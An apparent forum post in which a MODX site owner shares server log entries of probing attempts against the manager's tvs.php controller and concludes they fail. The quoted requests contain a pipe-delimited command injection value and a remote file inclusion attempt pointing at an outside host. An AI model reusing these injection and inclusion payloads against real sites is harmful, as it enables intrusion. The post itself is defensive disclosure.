Got a couple of these attempts in my inbox tonight. Doesn’t seem to do anything (the class_key seems to be sanitized properly, and directly calling the file breaks on the absence of $modx anyway), but thought I’d post this anyway.
Date & time: 21 Feb 2011 - 23:46:36
Requested: /modx//manager/controllers/default/resource/tvs.php?class_key=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C
Host:
http://www.markhamstra.nl
Visitor IP: 77.221.145.35
Referer: Not available.
User agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6
Date & time: 21 Feb 2011 - 23:46:27
Requested: /modx/general/mod-what.html//manager/controllers/default/resource/tvs.php?class_key=
http://www.somedomainidontwantyoutoaccidentlyclickon.com/v01///fff/12/Ckrid1.txt??
Host:
http://www.markhamstra.nl
Visitor IP: 77.221.145.35
Referer: Not available.
User agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6
The modx in the url seems to tick them off, though they tried several versions (just /modx/, /modx/general/ etc).